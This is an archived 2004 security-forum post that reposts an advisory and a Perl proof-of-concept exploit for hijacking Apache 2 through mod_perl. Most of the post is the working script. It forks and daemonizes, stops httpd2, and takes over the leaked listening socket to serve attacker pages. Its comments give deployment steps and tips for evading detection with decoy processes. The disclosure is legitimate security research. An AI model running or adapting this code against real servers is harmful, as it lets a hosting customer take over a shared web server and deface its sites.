Apache 2 Daemon Hijacking Via Mod

Full Version: Apache 2 Daemon Hijacking Via Mod_perl

GovernmentSecurity.org > The Archives > Public Downloads

Mrwh!P

Jan 23 2004, 01:09 AM

Author : Steve Grubb <linux_4ever@yahoo.com>
Download : http://www.security-corporation.com/downlo..._perl-sploit.pl
#!/usr/bin/perl
###############################################################################
#
#Hijacking Apache 2 via mod_perl
#
#The technique is simple.
#
#1) Fork and daemonize yourself.
#2) Do something evil to apache.
#2) Select on the leaked descriptor and start serving pages.
#
#At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assumed
#that paying customers can ftp anything they want into their website and mod_perl scripting is enabled.
#
#cp mod_perl-sploit.pl /var/www/perl
#
#lynx http://localhost/perl/mod_perl-sploit.pl
#
#Now, ps -ef to see how things are going:
#
#apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#
#So far, so good...
#
#lynx http://localhost
#
#And you should see the "You're owned" message. The really sneaky part is that 'ps -ef'
#gives only a minor hint that apache has been replaced. The only way to tell something is
#abnormal is that there's only 2 apache instances when a normal Mandrake server in its
#default configuration shows 5 instances. But, forking off a few decoy children should
#be easy enough to do.
#
#This was tested on a fully updated Mandrake 9.2 system.
#
###############################################################################
use POSIX qw(setsid);

if (!defined(my $pid = fork)) {
print "Content-Type: text/html\n\n";
print "cannot fork: $!";
exit 1;
} elsif ($pid) { # This is the parent
sleep(1);
print "Content-Type: text/html\n\n";
print "<html><body>Exploit installed</body></html>";
system '/usr/sbin/httpd2 -k stop';
sleep(2);
exit 0;
}

# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
my $rin = '';
vec($rin,fileno(Server),1) = 1;
$nfound = select($rout = $rin, undef, undef, undef);
if (accept(Client,Server) ) {
print Client "HTTP/1.0 200 OK\n";
print Client "Content-Length: 40\n";
print Client "Content-Type: text/html\n\n";
print Client "<html><body>";
print Client "You're owned.";
print Client "</body></html>";
close Client;
}
}

maybe interesting for somebody

or have anybody here testet it already?

so long Mrwh!P

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.